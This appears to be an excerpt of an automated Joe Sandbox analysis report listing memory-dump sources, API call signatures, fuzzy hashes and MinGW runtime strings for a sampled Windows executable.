                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Value$Free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2242701089-0
                                                                                                              • Opcode ID: 8401260f891ce7ee36d79187eb38dcddfd7f879feec07dce31bbb832c6b4651b
                                                                                                              • Instruction ID: 5875bfa179fcc9cad90cf5bf4817280002b0d8a2e03adad7604345b7e9ff1957
                                                                                                              • Opcode Fuzzy Hash: 8401260f891ce7ee36d79187eb38dcddfd7f879feec07dce31bbb832c6b4651b
                                                                                                              • Instruction Fuzzy Hash: 2AF0F835E0A60382F690BB54EC5503AA767FB94316FC450F4C81E276B5DE2CE505DE20

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: malloc$memcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3800483350-0
                                                                                                              • Opcode ID: eac881ba9be4422e74ab4bb80d3c5ac6897cf2d6396185e4c01f23072029ab8d
                                                                                                              • Instruction ID: e3e8098d25fcb04de0879112d49a336841e81d6209e0dbd4c51f77da688e29d5
                                                                                                              • Opcode Fuzzy Hash: eac881ba9be4422e74ab4bb80d3c5ac6897cf2d6396185e4c01f23072029ab8d
                                                                                                              • Instruction Fuzzy Hash: 49319E26E0860685F691BF01EC407B9A365FB04B96FC441F5CA1D67795EF3CA4898B60

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcscpywcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3616488086-0
                                                                                                              • Opcode ID: 4a904cedc9c4c55f78cb4b6f38c9d36089f92937f1aff207d21cf16635287a0a
                                                                                                              • Instruction ID: 8ef8d0a4fce8246ee39a59ba2609331950b7df9f184aa066be69ff4173982232
                                                                                                              • Opcode Fuzzy Hash: 4a904cedc9c4c55f78cb4b6f38c9d36089f92937f1aff207d21cf16635287a0a
                                                                                                              • Instruction Fuzzy Hash: 54210822A1824181E6A0AF11AC047BBE650FB847E9FC002B1EE9D67BD5DF7DD046CB40

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: memset
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 2221118986-4108050209
                                                                                                              • Opcode ID: bf49082e2a5bb2471ef02e236951e26930b7db1e87a132311abaa9c1bc46bc56
                                                                                                              • Instruction ID: d5a6bcc8d47008a9871db335e4f693ea4e485eee20b913c6faabf606049e13f6
                                                                                                              • Opcode Fuzzy Hash: bf49082e2a5bb2471ef02e236951e26930b7db1e87a132311abaa9c1bc46bc56
                                                                                                              • Instruction Fuzzy Hash: 4411B222B2969081E790E721E8543BBE660EFC47A8F940371FA9857BD5DF3DC5468B40

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Valuecalloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1846630847-0
                                                                                                              • Opcode ID: 6812f66216274d3c5c08e393cd21bced3b4cd23879353236181e403c5bd671cf
                                                                                                              • Instruction ID: 669717aafa27e45ba31b9aafe21d8a2b6421f479c7aa8b4bed13acac9ff66540
                                                                                                              • Opcode Fuzzy Hash: 6812f66216274d3c5c08e393cd21bced3b4cd23879353236181e403c5bd671cf
                                                                                                              • Instruction Fuzzy Hash: 9DF0E531B0920142F7E56741AD04775A295EF48BC2FC880F4DE0CAB3C0ED2CAC82CB20

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcslen$wcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3662116142-0
                                                                                                              • Opcode ID: cd400804e738a6a2e598a2b5e8d627f05c3e9b22e13fb12afb9f83f2548a3739
                                                                                                              • Instruction ID: b3c869f3c25a71b697c0badf6c34e90ac8b2a96f80a4b13a3f532c92346e6b68
                                                                                                              • Opcode Fuzzy Hash: cd400804e738a6a2e598a2b5e8d627f05c3e9b22e13fb12afb9f83f2548a3739
                                                                                                              • Instruction Fuzzy Hash: F5012662B0C68140E2B0FA12BD007FA9652EFC6BD1F8441B1FE8DA7B95CE3CD1418B04
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2221118986-0
                                                                                                              • Opcode ID: 1aa6017e8212d7d23ab123b29bd2faa6be019be7230b342e22f282b8c791c9a3
                                                                                                              • Instruction ID: 165347739e047cbfc3891f69a95d11ad9bb00363f9e77312e623f8755b1e7fd9
                                                                                                              • Opcode Fuzzy Hash: 1aa6017e8212d7d23ab123b29bd2faa6be019be7230b342e22f282b8c791c9a3
                                                                                                              • Instruction Fuzzy Hash: 80F0A796F1819541F750AA26A90437AD211E7C4BD4F84C170EF8C9B78EDE3CC4428B10
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: signal
                                                                                                              • String ID: CCG
                                                                                                              • API String ID: 1946981877-1584390748
                                                                                                              • Opcode ID: 10537504a00196a9b3d94431f1b0aef2330f68600c29619b56e7bd5272f2aefb
                                                                                                              • Instruction ID: c15c7a8b499ef2a558bcae14a08e01da52d16461b1f5869189c5dd8d7e0fde12
                                                                                                              • Opcode Fuzzy Hash: 10537504a00196a9b3d94431f1b0aef2330f68600c29619b56e7bd5272f2aefb
                                                                                                              • Instruction Fuzzy Hash: 1D415110E1910245FAF875785C50379A181DF8537AFE886F5D52DEB3F5DD2CA8908E31
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: fwprintf
                                                                                                              • String ID: %*.*S$%-*.*S$%.*S
                                                                                                              • API String ID: 968622242-2115465065
                                                                                                              • Opcode ID: 84d0b5af0bba28016d910b015659d004573e6a62aca6fc178380274daab50a2d
                                                                                                              • Instruction ID: 5a81a21262d567480c8052918fc738610da3842891cfee60988800f160fe6209
                                                                                                              • Opcode Fuzzy Hash: 84d0b5af0bba28016d910b015659d004573e6a62aca6fc178380274daab50a2d
                                                                                                              • Instruction Fuzzy Hash: AA41B862A1865285F7E0AE159C047B9F292EB80BD6FD881F4DE1CA76C5DE3CE4418F20
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Value$CriticalDeleteSectionfree
                                                                                                              • String ID:
                                                                                                              • API String ID: 2588641659-0
                                                                                                              • Opcode ID: 25fcd06e749af0576e577c08f9ed352b31984f942d49ab70c6168451ae3f547f
                                                                                                              • Instruction ID: 6683e3835334b1136309ac5c06105daa963d56de55c344d608033b419b23fc30
                                                                                                              • Opcode Fuzzy Hash: 25fcd06e749af0576e577c08f9ed352b31984f942d49ab70c6168451ae3f547f
                                                                                                              • Instruction Fuzzy Hash: A431B335D0D60782FAA0BB24EC94239A7AAFF94756FD441F5C41E666B0DE2CA844DF20
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: %*.*s$%-*.*s$%.*s
                                                                                                              • API String ID: 0-4054516066
                                                                                                              • Opcode ID: 93d9aa20cbdb08f1e76fe604c31f27c5c0d7c941f730e91fed70b1b938aed6fe
                                                                                                              • Instruction ID: c21426c0b567e82d845a95563743ca79a0dd2f9a79b3096f3ccdd96b0d877a6f
                                                                                                              • Opcode Fuzzy Hash: 93d9aa20cbdb08f1e76fe604c31f27c5c0d7c941f730e91fed70b1b938aed6fe
                                                                                                              • Instruction Fuzzy Hash: DA41B8B2A0875685E7E0BF25DC04279F796EB40756F94C1F4CE4DAA6C5EA2CA4418F20
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastProtectVirtual
                                                                                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                              • API String ID: 1672467334-2123141913
                                                                                                              • Opcode ID: d7a7c433264d073652459f1efc7dd244941dff9229673401627952973cab804b
                                                                                                              • Instruction ID: 523f5da9e1614ae9d9151b466db53ac667403174c1a5a436431d2c0d5a97e849
                                                                                                              • Opcode Fuzzy Hash: d7a7c433264d073652459f1efc7dd244941dff9229673401627952973cab804b
                                                                                                              • Instruction Fuzzy Hash: 5431D122F096428AF691AB50EC006B9B365FB44766FC481F1DE0CAB290EF3CE445CF20
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeavecalloc
                                                                                                              • String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
                                                                                                              • API String ID: 876395260-799109717
                                                                                                              • Opcode ID: e6aaeef770a37237046b64f61ce29759d7e0ea15082bef91a7bae917f86683eb
                                                                                                              • Instruction ID: 325a0ddba8c9a2a68066c4e1a5691a6fc0810728c0b74a9c4191ddaaee979d3d
                                                                                                              • Opcode Fuzzy Hash: e6aaeef770a37237046b64f61ce29759d7e0ea15082bef91a7bae917f86683eb
                                                                                                              • Instruction Fuzzy Hash: FC015E21A0960745FA90AB51FD442B5A39AFF48786FC440F0D90DA73A0EF2CA985CB20
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF723475553
                                                                                                              • Unknown pseudo relocation protocol version %d., xrefs: 00007FF723475562
                                                                                                              • Unknown pseudo relocation bit size %d., xrefs: 00007FF72347553A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                              • API String ID: 544645111-1286557213
                                                                                                              • Opcode ID: dc83335a3dadcf2524c3e82afb01ea5867741f387cfdd7ee093d0d9eb9ede651
                                                                                                              • Instruction ID: 53b3aa7c8431abcf2d599a45fbe96dc38b1d92157f604a2727c477c5086e246d
                                                                                                              • Opcode Fuzzy Hash: dc83335a3dadcf2524c3e82afb01ea5867741f387cfdd7ee093d0d9eb9ede651
                                                                                                              • Instruction Fuzzy Hash: 8371C122F1864285FAA0AB219D0067DA661FF41B9AFD445F5CD2DAB7C8DE3DE441CF20
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Byte$CharLeadMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 2561704868-0
                                                                                                              • Opcode ID: c24187cac5bff1d128cefd9ff085609a07eddebf6e59efd4b59ea4d86880635e
                                                                                                              • Instruction ID: 57a6b3504a7584ae6d5c610f36ac35b387d4b7bb78839b3ce3d9379afcc82464
                                                                                                              • Opcode Fuzzy Hash: c24187cac5bff1d128cefd9ff085609a07eddebf6e59efd4b59ea4d86880635e
                                                                                                              • Instruction Fuzzy Hash: E831B372A0C28186F3A05B34BC043B9B690FB80795F9881B5EA9997BD4CF3CD9858F10
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocCreateErrorLastSemaphoreabort
                                                                                                              • String ID:
                                                                                                              • API String ID: 4146797221-0
                                                                                                              • Opcode ID: 3df8b29197056a77df859586d79f1bf4d15e061451aadde36ef3289c2aa43424
                                                                                                              • Instruction ID: 29286111ab15e895d567d956afd2828a4d9923d0dd0197852f0e38bf2aee974b
                                                                                                              • Opcode Fuzzy Hash: 3df8b29197056a77df859586d79f1bf4d15e061451aadde36ef3289c2aa43424
                                                                                                              • Instruction Fuzzy Hash: CFF0FE70E0854381F6D4BB756C49039A757EF45353FD002F4C52DA25E0EF2CA5554E34
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-3474627141
                                                                                                              • Opcode ID: bec2a2abb497f7a81624d47846920bd0d53a5862057e49c32a94b49e0e59a488
                                                                                                              • Instruction ID: 8075797e1a45940bffeeeeb68183787a33fd3c933559954f24bb4d1f8b2d96e6
                                                                                                              • Opcode Fuzzy Hash: bec2a2abb497f7a81624d47846920bd0d53a5862057e49c32a94b49e0e59a488
